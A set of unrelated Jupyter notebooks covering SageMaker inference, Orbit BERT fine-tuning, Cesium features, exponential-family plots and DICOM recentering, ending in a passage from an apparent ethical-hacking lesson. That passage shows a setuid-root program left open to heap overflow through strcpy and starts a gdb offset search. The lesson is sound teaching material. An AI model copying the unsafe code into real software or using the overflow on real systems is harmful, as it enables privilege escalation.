with `local_sagemaker_notebook`for `accelerator_type`.*** ``` %%time predictor = mnist_estimator.deploy( initial_instance_count=1, instance_type="local", accelerator_type="local_sagemaker_notebook" ) ``` The request handling behavior of the Endpoint is determined by the ``mnist_ei.py`` script. In this case, the script doesn't include any request handling functions, so the Endpoint will use the default handlers provided by SageMaker. These default handlers allow us to perform inference on input data encoded as a multi-dimensional JSON array. ### Making an inference request locally Now that our Endpoint is deployed and we have a ``predictor`` object, we can use it to classify handwritten digits. To see inference in action, draw a digit in the image box below. The pixel data from your drawing will be loaded into a ``data`` variable in this notebook. *Note: after drawing the image, you'll need to move to the next notebook cell.* ``` from IPython.display import HTML HTML(open("input.html").read()) ``` Now we can use the ``predictor`` object to classify the handwritten digit: ``` %%time response = predictor.predict(data) print("Raw prediction result:") print(response) labeled_predictions = list(zip(range(10), response[0])) print("Labeled predictions: ") print(labeled_predictions) labeled_predictions.sort(key=lambda label_and_prob: 1.0 - label_and_prob[1]) print("Most likely answer: {}".format(labeled_predictions[0])) ``` ### Delete the endpoint After you have finished with this example, remember to delete the prediction endpoint to release the instance(s) associated with it. ``` print("Endpoint name: " + predictor.endpoint) import sagemaker predictor.delete_endpoint() ```
github_jupyter
##### Copyright 2020 The TensorFlow Authors. ``` #@title Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ``` # Fine-tuning a BERT model with Orbit <table class="tfo-notebook-buttons" align="left"> <td> <a target="_blank" href="https://www.tensorflow.org/text/tutorials/bert_orbit"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />View on TensorFlow.org</a> </td> <td> <a target="_blank" href="https://colab.research.google.com/github/tensorflow/text/blob/master/docs/tutorials/bert_orbit.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />Run in Google Colab</a> </td> <td> <a target="_blank" href="https://github.com/tensorflow/text/blob/master/docs/tutorials/bert_orbit.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />View on GitHub</a> </td> <td> <a href="https://storage.googleapis.com/tensorflow_docs/text/docs/tutorials/bert_orbit.ipynb"><img src="https://www.tensorflow.org/images/download_logo_32px.png" />Download notebook</a> </td> </table> This example will work through fine-tuning a BERT model using the [Orbit](https://www.tensorflow.org/api_docs/python/orbit) training library. Orbit is a flexible, lightweight library designed to make it easy to write [custom training loops](https://www.tensorflow.org/tutorials/distribute/custom_training) in TensorFlow. Orbit handles common model training tasks such as saving checkpoints, running model evaluations, and setting up summary writing, while giving users full control over implementing the inner training loop. It integrates with `tf.distribute` and supports running on different device types (CPU, GPU, and TPU). Most examples on [tensorflow.org](https://www.tensorflow.org/) use custom training loops or [model.fit()](https://www.tensorflow.org/api_docs/python/tf/keras/Model) from Keras. Orbit is a good alternative to `model.fit` if your model is complex and your training loop requires more flexibility, control, or customization. Also, using Orbit can simplify the code when there are many different model architectures that all use the same custom training loop. This tutorial focuses on setting up and using Orbit, rather than details about BERT, model construction, and data processing. For more in-depth tutorials on these topics, refer to the following tutorials: * [Fine tune BERT](https://www.tensorflow.org/text/tutorials/fine_tune_bert) - which goes into detail on these sub-topics. * [Fine tune BERT for GLUE on TPU](https://www.tensorflow.org/text/tutorials/bert_glue) - which generalizes the code to run any BERT configuration on any [GLUE](https://www.tensorflow.org/datasets/catalog/glue) sub-task, and runs on TPU. ## Install the TensorFlow Models package Install and import the necessary packages, then configure all the objects necessary for training a model. ``` # Uninstall opencv-python to avoid a conflict (in Colab) with the opencv-python-headless package that tf-models uses. !pip uninstall -y opencv-python !pip install -U -q "tensorflow>=2.9.0" "tf-models-official" ``` The `tf-models-official` package contains both the `orbit` and `tensorflow_models` modules. ``` import tensorflow_models as tfm import orbit ``` ## Setup for training This tutorial does not focus on configuring the environment, building the model and optimizer, and loading data. All these techniques are covered in more detail in the [Fine tune BERT](https://www.tensorflow.org/text/tutorials/fine_tune_bert) and [Fine tune BERT with GLUE](https://www.tensorflow.org/text/tutorials/bert_glue) tutorials. To view how the training is set up for this tutorial, expand the rest of this section. <!-- <div class="tfo-display-only-on-site"><devsite-expandable> <button type="button" class="button-red button expand-control">Expand Section</button> --> ### Import the necessary packages Import the BERT model and dataset building library from [Tensorflow Model Garden](https://github.com/tensorflow/models). ``` import glob import os import pathlib import tempfile import time import numpy as np import tensorflow as tf from official.nlp.data import sentence_prediction_dataloader from official.nlp import optimization ``` ### Configure the distribution strategy While `tf.distribute` won't help the model's runtime if you're running on a single machine or GPU, it's necessary for TPUs. Setting up a distribution strategy allows you to use the same code regardless of the configuration. ``` logical_device_names = [logical_device.name for logical_device in tf.config.list_logical_devices()] if 'GPU' in ''.join(logical_device_names): strategy = tf.distribute.MirroredStrategy() elif 'TPU' in ''.join(logical_device_names): resolver = tf.distribute.cluster_resolver.TPUClusterResolver(tpu='') tf.config.experimental_connect_to_cluster(resolver) tf.tpu.experimental.initialize_tpu_system(resolver) strategy = tf.distribute.TPUStrategy(resolver) else: strategy = tf.distribute.OneDeviceStrategy(logical_device_names[0]) ``` For more information about the TPU setup, refer to the [TPU guide](https://www.tensorflow.org/guide/tpu). ### Create a model and an optimizer ``` max_seq_length = 128 learning_rate = 3e-5 num_train_epochs = 3 train_batch_size = 32 eval_batch_size = 64 train_data_size = 3668 steps_per_epoch = int(train_data_size / train_batch_size) train_steps = steps_per_epoch * num_train_epochs warmup_steps = int(train_steps * 0.1) print("train batch size: ", train_batch_size) print("train epochs: ", num_train_epochs) print("steps_per_epoch: ", steps_per_epoch) model_dir = pathlib.Path(tempfile.mkdtemp()) print(model_dir) ``` Create a BERT Classifier model and a simple optimizer. They must be created inside `strategy.scope` so that the variables can be distributed. ``` with strategy.scope(): encoder_network = tfm.nlp.encoders.build_encoder( tfm.nlp.encoders.EncoderConfig(type="bert")) classifier_model = tfm.nlp.models.BertClassifier( network=encoder_network, num_classes=2) optimizer = optimization.create_optimizer( init_lr=3e-5, num_train_steps=steps_per_epoch * num_train_epochs, num_warmup_steps=warmup_steps, end_lr=0.0, optimizer_type='adamw') tf.keras.utils.plot_model(classifier_model) ``` ### Initialize from a Checkpoint ``` bert_dir = 'gs://cloud-tpu-checkpoints/bert/v3/uncased_L-12_H-768_A-12/' tf.io.gfile.listdir(bert_dir) bert_checkpoint = bert_dir + 'bert_model.ckpt' def init_from_ckpt_fn(): init_checkpoint = tf.train.Checkpoint(**classifier_model.checkpoint_items) with strategy.scope(): (init_checkpoint .read(bert_checkpoint) .expect_partial() .assert_existing_objects_matched()) with strategy.scope(): init_from_ckpt_fn() ``` To use Orbit, create a `tf.train.CheckpointManager` object. ``` checkpoint = tf.train.Checkpoint(model=classifier_model, optimizer=optimizer) checkpoint_manager = tf.train.CheckpointManager( checkpoint, directory=model_dir, max_to_keep=5, step_counter=optimizer.iterations, checkpoint_interval=steps_per_epoch, init_fn=init_from_ckpt_fn) ``` ### Create distributed datasets As a shortcut for this tutorial, the [GLUE/MPRC dataset](https://www.tensorflow.org/datasets/catalog/glue#gluemrpc) has been converted to a pair of [TFRecord](https://www.tensorflow.org/tutorials/load_data/tfrecord) files containing serialized `tf.train.Example` protos. The data was converted using [this script](https://github.com/tensorflow/models/blob/r2.9.0/official/nlp/data/create_finetuning_data.py). ``` train_data_path = "gs://download.tensorflow.org/data/model_garden_colab/mrpc_train.tf_record" eval_data_path = "gs://download.tensorflow.org/data/model_garden_colab/mrpc_eval.tf_record" def _dataset_fn(input_file_pattern, global_batch_size, is_training, input_context=None): data_config = sentence_prediction_dataloader.SentencePredictionDataConfig( input_path=input_file_pattern, seq_length=max_seq_length, global_batch_size=global_batch_size, is_training=is_training) return sentence_prediction_dataloader.SentencePredictionDataLoader( data_config).load(input_context=input_context) train_dataset = orbit.utils.make_distributed_dataset( strategy, _dataset_fn, input_file_pattern=train_data_path, global_batch_size=train_batch_size, is_training=True) eval_dataset = orbit.utils.make_distributed_dataset( strategy, _dataset_fn, input_file_pattern=eval_data_path, global_batch_size=eval_batch_size, is_training=False) ``` ### Create a loss function ``` def loss_fn(labels, logits): """Classification loss.""" labels = tf.squeeze(labels) log_probs = tf.nn.log_softmax(logits, axis=-1) one_hot_labels = tf.one_hot( tf.cast(labels, dtype=tf.int32), depth=2, dtype=tf.float32) per_example_loss = -tf.reduce_sum( tf.cast(one_hot_labels, dtype=tf.float32) * log_probs, axis=-1) return tf.reduce_mean(per_example_loss) ``` </devsite-expandable></div> ## Controllers, Trainers and Evaluators When using Orbit, the `orbit.Controller` class drives the training. The Controller handles the details of distribution strategies, step counting, TensorBoard summaries, and checkpointing. To implement the training and evaluation, pass a `trainer` and `evaluator`, which are subclass instances of `orbit.AbstractTrainer` and `orbit.AbstractEvaluator`. Keeping with Orbit's light-weight design, these two classes have a minimal interface. The Controller drives training and evaluation by calling `trainer.train(num_steps)` and `evaluator.evaluate(num_steps)`. These `train` and `evaluate` methods return a dictionary of results for logging. Training is broken into chunks of length `num_steps`. This is set by the Controller's [`steps_per_loop`](https://tensorflow.org/api_docs/python/orbit/Controller#args) argument. With the trainer and evaluator abstract base classes, the meaning of `num_steps` is entirely determined by the implementer. Some common examples include: * Having the chunks represent dataset-epoch boundaries, like the default keras setup. * Using it to more efficiently dispatch a number of training steps to an accelerator with a single `tf.function` call (like the `steps_per_execution` argument to `Model.compile`). * Subdividing into smaller chunks as needed. ### StandardTrainer and StandardEvaluator Orbit provides two additional classes, `orbit.StandardTrainer` and `orbit.StandardEvaluator`, to give more structure around the training and evaluation loops. With StandardTrainer, you only need to set `train_loop_begin`, `train_step`, and `train_loop_end`. The base class handles the loops, dataset logic, and `tf.function` (according to the options set by their `orbit.StandardTrainerOptions`). This is simpler than `orbit.AbstractTrainer`, which requires you to handle the entire loop. StandardEvaluator has a similar structure and simplification to StandardTrainer. This is effectively an implementation of the `steps_per_execution` approach used by Keras. Contrast this with Keras, where training is divided both into epochs (a single pass over the dataset) and `steps_per_execution`(set within [`Model.compile`](https://www.tensorflow.org/api_docs/python/tf/keras/Model#compile). In Keras, metric averages are typically accumulated over an epoch, and reported & reset between epochs. For efficiency, `steps_per_execution` only controls the number of training steps made per call. In this simple case, `steps_per_loop` (within `StandardTrainer`) will handle both the metric resets and the number of steps per call. The minimal setup when using these base classes is to implement the methods as follows: 1. `StandardTrainer.train_loop_begin` - Reset your training metrics. 2. `StandardTrainer.train_step` - Apply a single gradient update. 3. `StandardTrainer.train_loop_end` - Report your training metrics. and 4. `StandardEvaluator.eval_begin` - Reset your evaluation metrics. 5. `StandardEvaluator.eval_step` - Run a single evaluation setep. 6. `StandardEvaluator.eval_reduce` - This is not necessary in this simple setup. 7. `StandardEvaluator.eval_end` - Report your evaluation metrics. Depending on the settings, the base class may wrap the `train_step` and `eval_step` code in `tf.function` or `tf.while_loop`, which has some limitations compared to standard python. ### Define the trainer class In this section you'll create a subclass of `orbit.StandardTrainer` for this task. Note: To better explain the `BertClassifierTrainer` class, this section defines each method as a stand-alone function and assembles them into a class at the end. The trainer needs access to the training data, model, optimizer, and distribution strategy. Pass these as arguments to the initializer. Define a single training metric, `training_loss`, using `tf.keras.metrics.Mean`. ``` def trainer_init(self, train_dataset, model, optimizer, strategy): self.strategy = strategy with self.strategy.scope(): self.model = model self.optimizer = optimizer self.global_step = self.optimizer.iterations self.train_loss = tf.keras.metrics.Mean( 'training_loss', dtype=tf.float32) orbit.StandardTrainer.__init__(self, train_dataset) ``` Before starting a run of the training loop, the `train_loop_begin` method will reset the `train_loss` metric. ``` def train_loop_begin(self): self.train_loss.reset_states() ``` The `train_step` is a straight-forward loss-calculation and gradient update that is run by the distribution strategy. This is accomplished by defining the gradient step as a nested function (`step_fn`). The method receives `tf.distribute.DistributedIterator` to handle the [distributed input](https://www.tensorflow.org/tutorials/distribute/input). The method uses `Strategy.run` to execute `step_fn` and feeds it from the distributed iterator. ``` def train_step(self, iterator): def step_fn(inputs): labels = inputs.pop("label_ids") with tf.GradientTape() as tape: model_outputs = self.model(inputs, training=True) # Raw loss is used for reporting in metrics/logs. raw_loss = loss_fn(labels, model_outputs) # Scales down the loss for gradients to be invariant from replicas. loss = raw_loss / self.strategy.num_replicas_in_sync grads = tape.gradient(loss, self.model.trainable_variables) optimizer.apply_gradients(zip(grads, self.model.trainable_variables)) # For reporting, the metric takes the mean of losses. self.train_loss.update_state(raw_loss) self.strategy.run(step_fn, args=(next(iterator),)) ``` The `orbit.StandardTrainer` handles the `@tf.function` and loops. After running through `num_steps` of training, `StandardTrainer` calls `train_loop_end`. The function returns the metric results: ``` def train_loop_end(self): return { self.train_loss.name: self.train_loss.result(), } ``` Build a subclass of `orbit.StandardTrainer` with those methods. ``` class BertClassifierTrainer(orbit.StandardTrainer): __init__ = trainer_init train_loop_begin = train_loop_begin train_step = train_step train_loop_end = train_loop_end ``` ### Define the evaluator class Note: Like the previous section, this section defines each method as a stand-alone function and assembles them into a `BertClassifierEvaluator` class at the end. The evaluator is even simpler for this task. It needs access to the evaluation dataset, the model, and the strategy. After saving references to those objects, the constructor just needs to create the metrics. ``` def evaluator_init(self, eval_dataset, model, strategy): self.strategy = strategy with self.strategy.scope(): self.model = model self.eval_loss = tf.keras.metrics.Mean( 'evaluation_loss', dtype=tf.float32) self.eval_accuracy = tf.keras.metrics.SparseCategoricalAccuracy( name='accuracy', dtype=tf.float32) orbit.StandardEvaluator.__init__(self, eval_dataset) ``` Similar to the trainer, the `eval_begin` and `eval_end` methods just need to reset the metrics before the loop and then report the results after the loop. ``` def eval_begin(self): self.eval_accuracy.reset_states() self.eval_loss.reset_states() def eval_end(self): return { self.eval_accuracy.name: self.eval_accuracy.result(), self.eval_loss.name: self.eval_loss.result(), } ``` The `eval_step` method works like `train_step`. The inner `step_fn` defines the actual work of calculating the loss & accuracy and updating the metrics. The outer `eval_step` receives `tf.distribute.DistributedIterator` as input, and uses `Strategy.run` to launch the distributed execution to `step_fn`, feeding it from the distributed iterator. ``` def eval_step(self, iterator): def step_fn(inputs): labels = inputs.pop("label_ids") model_outputs = self.model(inputs, training=True) loss = loss_fn(labels, model_outputs) self.eval_loss.update_state(loss) self.eval_accuracy.update_state(labels, model_outputs) self.strategy.run(step_fn, args=(next(iterator),)) ``` Build a subclass of `orbit.StandardEvaluator` with those methods. ``` class BertClassifierEvaluator(orbit.StandardEvaluator): __init__ = evaluator_init eval_begin = eval_begin eval_end = eval_end eval_step = eval_step ``` ### End-to-end training and evaluation To run the training and evaluation, simply create the trainer, evaluator, and `orbit.Controller` instances. Then call the `Controller.train_and_evaluate` method. ``` trainer = BertClassifierTrainer( train_dataset, classifier_model, optimizer, strategy) evaluator = BertClassifierEvaluator( eval_dataset, classifier_model, strategy) controller = orbit.Controller( trainer=trainer, evaluator=evaluator, global_step=trainer.global_step, steps_per_loop=20, checkpoint_manager=checkpoint_manager) result = controller.train_and_evaluate( train_steps=steps_per_epoch * num_train_epochs, eval_steps=-1, eval_interval=steps_per_epoch) ```
github_jupyter
# Cesium ``` #!pip install cesium # !pip install pandas==1.0.5 %load_ext autoreload %load_ext memory_profiler %autoreload 2 import numpy as np import pandas as pd from pathlib import Path from datetime import datetime import scipy.stats as ss ``` --- ``` # create some dummy data data_dir = Path("../data") df_acc = pd.read_parquet( data_dir.joinpath("empatica/acc.parquet"), engine="fastparquet" ).set_index("timestamp") fs = 1000 # the sample frequency duration_s = 1 * 60 * 60 # 1 hour of data size = int(duration_s * fs) df_emg = pd.DataFrame( index=pd.date_range( start=datetime.now(), periods=size, freq=pd.Timedelta(seconds=1 / fs) ), data=np.array( [ np.repeat(df_acc.values[:, idx % 3] / 64, np.ceil(size / len(df_acc)))[ :size ] for idx in range(5) ] ).astype(np.float32).transpose(), columns=["emg", "eog", "lso", "rio", "m1-a1"], ) print("memory usage: ", round(sum(df_emg.memory_usage(deep=True) / (2**20)), 2), "MB") df_emg.tail(3) from cesium import featurize, util, data_management, time_series, datasets eeg = datasets.fetch_andrzejak() # Group together classes (Z, O), (N, F), (S) as normal, interictal, ictal eeg["classes"] = eeg["classes"].astype("U16") # allocate memory for longer class names eeg["classes"][np.logical_or(eeg["classes"]=="Z", eeg["classes"]=="O")] = "Normal" eeg["classes"][np.logical_or(eeg["classes"]=="N", eeg["classes"]=="F")] = "Interictal" eeg["classes"][eeg["classes"]=="S"] = "Ictal" pd.DataFrame(eeg) ``` ## univariate seres where we mingle :clown: ``` from cesium import featurize features_to_use = [ "amplitude", "percent_beyond_1_std", "maximum", "max_slope", "median", "median_absolute_deviation", "percent_close_to_median", "minimum", "skew", "std", "weighted_average", ] # copy the eeg sample dict eeg_mingled = eeg.copy() # create a new view where each for idx in np.random.choice(len(eeg['measurements']), size=300, replace=False): times = eeg_mingled["times"][idx] measurements = eeg_mingled["measurements"][idx] new_length = np.random.choice(len(times), size=1)[0] eeg_mingled["times"][idx] = times[:new_length] eeg_mingled["measurements"][idx] = measurements[:new_length] for t in eeg_mingled['times'][:25]: print(t.shape) #%%memit fset_cesium = featurize.featurize_time_series( times=eeg_mingled["times"], values=eeg_mingled["measurements"], errors=None, features_to_use=features_to_use, ) fset_cesium. ``` ## Custom one to many features ``` def mean_std_signal(t, m, e): return [np.mean(m), np.std(m)] def skew_signal(t, m, e): return ss.skew(m) guo_features = { "mean_std": mean_std_signal, "skew": skew_signal } fset_guo = featurize.featurize_time_series(times=eeg["times"], values=eeg["measurements"], errors=None, features_to_use=list(guo_features.keys()), # meta_features== features which are added to the output custom_functions=guo_features) ``` --- ## Multivariate series where we mingle ``` !pip install PyWavelets import pywt # create a view with 3 channels n_channels = 3 eeg["dwts"] = [pywt.wavedec(m, pywt.Wavelet("db1"), level=n_channels-1) for m in eeg["measurements"]] # copy the eeg sample dict eeg_mingled = eeg.copy() # downsize the dimensions randomly for idx in np.random.choice(len(eeg["dwts"]), size=250, replace=False): for i in range(3): new_length = np.random.choice(len(eeg_mingled["dwts"][idx][i]), size=1)[0] + 20 eeg_mingled["dwts"][idx][i] = eeg_mingled["dwts"][idx][i][:new_length] # validation -> print some of these dimensions for dwts in eeg_mingled['dwts'][:10]: print("shapes: ", ", ".join([str(len(dwt)) for dwt in dwts])) # try to calculate the features fset_dwt = featurize.featurize_time_series( times=None, values=eeg_mingled["dwts"], errors=None, features_to_use=features_to_use, ) fset_dwt.head() ```
github_jupyter
# Translator: Go from moment representation to ExpFam-representation This task is about taking a distribution represented by its moment-parameters, translate it into the exponential family representation, and compare the two by plotting them. We will focus on Gaussians and Gamma-distributed variables here, but this exercise an be done for any exp.fam. distribution. **Imports** ``` import numpy as np import matplotlib.pyplot as plt from scipy.stats import norm, gamma from scipy.special import gammaln ``` **Helper function** Take representation of an exp.fam. distribution and a function to plot the moment-pdf ``` def plot_pdf(x, h, T, eta, A, moment_pdf): """ Put the pieces of an exp.fam.representation together and compare with the moment-representation. :param x: The values for which we will evaluate the two functions -- a list of x-values for which the pdf's are calculated :param h: The log-base measure. This is a *function* that can be evaluated at any x, and for each x return a scalar :param T: The sufficient statistics function. This is again a *Æfunction*. Takes a vector as input and return a matrix (the vector of sufficient statistics for each value of the x-vector) :param eta: Natural parameters. This is a vector, constant in x so not a function. :param A: The log partition function. This is defined by the parameterization, hence not a function in the implementation. :param moment_pdf: A function that generates the pdf using moment parameters (so, a "pointer" to a built-in) :return: Nothing. """ log_exp_fam = h(x) + np.matmul(eta, T(x)) - A # Put together the log-pdf of the exp.fam. distribution plt.plot(x, np.exp(log_exp_fam), "b-") # Plot it plt.plot(x, moment_pdf(x), "r--") # Plot the "gold-standard" plt.title('Moment PDF (red) and ExpFam pdf (blue). Hopefully identical') plt.show() ``` ## EXAMPLE: GAUSSIAN **Define the starting-point**, that is, define the moment-parameters, the range for which 98% of the probability mass resides, and the pdf-function ``` # Moment parameters sigma = 3. mu = -1. # Choose x to cover most of the are where the distribution has probability mass x = np.linspace(norm.ppf(0.01, loc=mu, scale=sigma), norm.ppf(0.99, loc=mu, scale=sigma), 25) # The comparison: Gauss pdf using the moment parameters def normal_pdf_function(x): return norm.pdf(x, loc=mu, scale=sigma) ``` ### Define the exp.fam. representation **Log base measure:** For the Gaussian, $h(x) = -.5\log(2\pi)$. It is constant in $x$ for the Gaussian distribution, but is defined as a function in the implementation anyway, because the log base measure is a function in general. ``` def log_base_measure_func(x): return -.5 * np.log(2*np.pi) ``` **Sufficient statistics:** For the gaussian, $T(x) = [x, x^2]$. Note that if `x` is a vector/list this function should return an array ``` def T_func(x): # Define storage space ans = np.zeros((2, x.shape[0])) # Fill in values ans[0, :] = x ans[1, :] = x * x return ans ``` **Natural parameters:** Defined from the moment parameters, and for the Gaussian it is $[\frac{\mu}{\sigma^2}, -\frac{1}{2\sigma^2}]$. ``` natural_parameters = np.array([mu/(sigma*sigma), -.5/(sigma*sigma)]) ``` **Log partition function:** Can be defined from moment parameters $(\mu, \sigma)$ or alternatively from natural parameters. Here we use $A=\frac{\mu^2}{2\sigma^2} + \log|\sigma|$. ``` log_partition = mu*mu/(2*sigma*sigma) + np.log(sigma) ``` ### Plot the exp-fam we generated, and compare to the moment-parameterized PDF Note how functions are passed on, e.g. `h=log_base_measure_func` will ensure that `h(x)`can be called from `plot_pdf` with the `x` that is defined in the scope fo that function. ``` plot_pdf(x=x, h=log_base_measure_func, T=T_func, eta=natural_parameters, A=log_partition, moment_pdf=normal_pdf_function) ``` ## And now the Gamma-distruibution Start by setting up. We can later play with alpha and beta ``` # Moment parameters alpha = 2. beta = 3. # Choose x as the range that covers 98% prob.mass x = np.linspace(gamma.ppf(0.01, a=alpha, scale=1/beta), gamma.ppf(0.99, a=alpha, scale=1/beta), 25) # Calculate moment-parameter pdf def gamma_pdf_func(x): return gamma.pdf(x, a=alpha, scale=1/beta) ``` ### Make the ExpFam representation Information about the Gamma can be found [here](https://en.wikipedia.org/wiki/Exponential_family#Table_of_distributions "here") or in the slides. ``` # Log base measure: $h(x) = 0$. It is constant in x, but is defined as a function anyway def log_base_measure_func(x): return 0 # Sufficient statistics: $T(x) = [\log(x), x]$. # If x is an array this function should return an array def T_func(x): # Define storage space ans = np.zeros((2, x.shape[0])) # Fill in values ans[0, :] = np.log(x) ans[1, :] = x return ans # Natural parameters: Defined from the moment parameters natural_parameters = np.array([alpha - 1, -beta]) # Log partition function. Can be defined from moment parameters alpha, beta # or alternatively from natural parameters [eta1, eta2] log_partition = gammaln(alpha) - alpha * np.log(beta) ``` **Test by generating a plot** ``` plot_pdf(x=x, h=log_base_measure_func, T=T_func, eta=natural_parameters, A=log_partition, moment_pdf=gamma_pdf_func) ```
github_jupyter
# Notebook to recenter images of a DICOM dataset - CT scan version Use this notebook to navigate and select a location in the image to recenter a series of images. It loads an specific series and uses the notebook to select a location. This notebook shows an example how to process a CT dataset. Some tricks need to be done to be sure it can be loaded into the Sonalleve treatment planning. **Very important, make as many copies of this notebook for each transformation applied. Like that the notebook is also the documentation of the transformation applied. This will be extremely useful for future analysis or for people reviewing the process** ** Also important. Operations are accumulative, meaning that you have to be careful of applying only once the desired translation/rotation.** If you need to start from scratch, simply re-execute from the cell with the code `A=SelectionMarkersUI(...` Do not forget to execute cells with "shift-Enter" ``` %matplotlib nbagg from __future__ import print_function from RecenterDicom import * import matplotlib.pyplot as plt ``` ## Select a directory that contains the DICOMDIR file of the exported dataset Assign the value to the ``base_dir`` variable. The code will print a list of all the series. Be sure of having inspected the dataset before with Osirix or any other DICOM viewer so you have an idea already of which dataset to select ``` base_dir = 'C:\Patient Data\Neuroblastoma\NB2\Patient Data CD2' PrintDicomDirSeries(base_dir) ``` ## Select a CT scan series by their UID Just copy the text of the UID above of the series you want to process. This is the best way to be sure you are loading the correct dataset. ## Select a MRI scan series that will be used as template We'll use an existing MRI dataset to grab any MRI DICOM file as template to do the "conversion" trick (Ari Partanen deserves the credit for this idea). This function will return only the filenames in the list MRIfiles Alternative, you could use a path to any other MRI dicom file (as much it is single slice) such as: `PathToMRIFile = "C:\\MyDicomFiles\\OneDataset\\A\\B\\C\\A3424.DCM"` or whatever #### OPTIONAL: Apply a rotation Many datasets are not necessarily showing a patient in the right orientation, especially for furhter analysis with the Sonalleve SW. If the dataset is required to be rotated, **DO IT BEFORE THE RECENTERING!!!!**. Uncomment and execute the code below if you need a rotation. For some datasets it rotates correctly, but for some other it rotates in one of other axis. Still need to figure out. But a little try and error for the moment will be still required to rotate the image as needed. Try a combination with axis either being 'RL', 'HF' or 'AP' ``` A=SelectionMarkersUI(base_dir,'1.2.528.1.1001.100.3.52861.3269.19990825110.20160420214120015') MRIfiles=ReadSpecificSeries(base_dir,'1.2.528.1.1001.100.3.2037.549.19990825110.20160420212840109',bReturnOnlyFileNames=True) #uncomment this line to apply a rotation, pick the desired value A.Rotation(180,axis='HF') ``` ## Use the interactive tool to select the number of slice, and (x,y)-coordinates in pixel of the location you want to use as the place to recenter the dataset. By default the 3D visualization is off to help to select faster the location. Once the location is identified, activating the 3D visualization will help to confim its location in the MRI coordinate system. At this moment, the recenter hasn't yet been applied in the images. If already know the location of slice, x-coordinate and y-coordinate (which may the case when reprocessing), you can comment the call to `InteractiveSel()` and un-comment the `ShowData` function call where you specify the # slice and x- and y-coordinates directly. This may be handy to keep documented the changes. ``` A.InteractiveSel() ``` ## "Execute" the offset to the dataset The selected location during the navigation is now applied with the code below ``` A.ApplyOffset() ``` ## "Convert" to MRI DICOM **Very important**, some CT scans have one or more extra slices at the beginning to show location of the scans. By example: <img src="./Capture.PNG" width="300" height="300" /> This image needs to be removed from the dataset. To accomplish this, set a value in the parameter **`SkipImages`** in the function `ConvertCTtoMRI`. In this example, we skip only the first image. You can also notice we just use the first entry of the `MRIfiles` (we just need one). You can replace this by your own path. ### Important notes As usual when dealing with DICOM files, vendors love to do whatever they want with the standard and sometimes they do not provide all the metadata required to do the "conversion" trick. I have identified 3 fields that may be missing in the GE CT scans: ReconstructionDiameter, SpacingBetweenSlices and SlicePositon. So far, it seems easy to reconstruct them. If any other appears with another dataset, let me know. ### Adjust of contrast The Sonalleve planning software have some limited control on the adjust of the contrast image. If the CT data is copied natively, a lot of image regions appears hyperintense and cut in intensity. It makes difficult to navigate them. The parameter `bAdjustContrastParam` activates the adjust of the contrast to make it more readable. It is not 100% as good as a real DICOM viewer but it helps a lot to make it more easy to visualize in the Sonalleve SW. The function `ConvertCTtoMRI` has the following extra parameters controlling the adjustment of contrast. Default values seem to produce reasonable results: * `lowhighin` (default [0,1]) is a two-value list that indicates the normalized range of the datatype dynamic to preseve from the input image. [0,1] means that values from 0 to 2^16-1 will be kept. It must have a values from 0 to 1, and lowhighin[1]>lowhighin[0] * `lowhighout` (default [0,1]) is a two-value list that indicates the normalized range of the datatype dynamic to strecth the data. [0,1] means that the input range will be stretched in values ranging from 0 to *2^16-1. * `gamma` (default 1.5) is the exponent coefficient used to adjust background luminosity. Values inferior to 1 increase the luminosity. **This seems to be the best parameter to play around**. Values larger than 1.5 seem to work nicely. **Very important** If using a `gamma` value greater than 1 the image may look "*completely*" dark on the Sonalleve. The opposite will happen with `gamma` less than 1 (a hyperintense image). Just adjust the brightness in the Sonalleve and the figure will appear correctly. ``` A.ConvertCTtoMRI(MRIfiles[0],SkipImages=1,bAdjustContrastParam=True,gamma=1.6) ``` ## Export the data Specify a directory where to export the data. If the directory does not exist, it will be created. Be sure of avoiding directories with original data. Also, if you call again this step later, all images in the specified subdirectory will be overwritten. You can specify the flag 'bDeleteFilesFirst=True' to delete files in the target directory. This is useful if you are reusing the same directory over and over. If you end exporting a dataset with less images than a previous exports,it may cause problems in the Sonalleve. ``` A.ExportData('C:\Patient Data\ExportedForSonnalleve',bDeleteFilesFirst=True) ``` ## Use the data The exported data is conformal with DICOM viewers and the Sonalleve software. For the Sonalleve, start an standalone operation, input a body temperature. Modify the code below to match your Sonalleve directory, the location of dcmtk and the directory where you exported the data. Just run it with shift-Enter as usual and the images should be imported in the Sonalleve. Be sure the last line is correct to put back the current working directory in the notebook. ``` import os curdir=os.getcwd() %cd "C:/Program Files (x86)/Philips Medical Systems/HIFU/3.2.740.2311" %run ./Scripts/DICOM/PlanningImageImporter.py -d "C:\Patient Data\ExportedForSonnalleve" -t "C:\dcmtk-3.6.0-win32-i386\bin" # DO NOT FORGET TO PUT BACK YOUR CURRENT DIRECTORY %cd "C:/Users/Charles/Desktop/ReCenterMRI" ```
github_jupyter
# Heap Overflow - buffer overflow can happen in other segments such as **heap**, **data** and **bss** - if an important variable is located after a buffer vulnerable to an overflow, the program's control flow can be altered (regardless of the memory segment) - controls may be limited ## Heap Overflow - heap overflow may not be as common as stack overflow but can be just as effective ### demos/heap_overflow/secret.cpp - review the program and spot the following line that's susceptible ```c++ strcpy(secret, argv[1]); // culprit! ``` ``` %cd demos/heap_overflow %pwd ! cat secret.cpp ! echo kali | sudo -S make ``` ### secret.exe must be setuid root program - all users in the system can keep their own secret by writing to /var/secrets file ``` ! ls -al secret.exe # run the program ! ./secret.exe # run the program with argument ! ./secret.exe "my top secret data" ! ./secret.exe "new note for user" ! echo kali | sudo -S cat /var/secret ``` ## overflowing buffer by corrupting datafile - how far down is secret_file from secret buffer (the offset)? - use gdb - subtract the address of secret buffer from the address of scret_file ```bash ┌──(kali㉿K)-[~/projects/EthicalHacking/demos/heap_overflow] └─$ sudo gdb -q ./secret.exe Reading symbols from ./secret.exe... (gdb) break main Breakpoint 1 at 0x804936a: file secret.cpp, line 21. (gdb) run "some secret" Starting program: /home/kali/projects/EthicalHacking/demos/heap_overflow/secret.exe "some secret" Breakpoint 1, main (argc=2, argv=0xffffd614) at secret.cpp:21 21 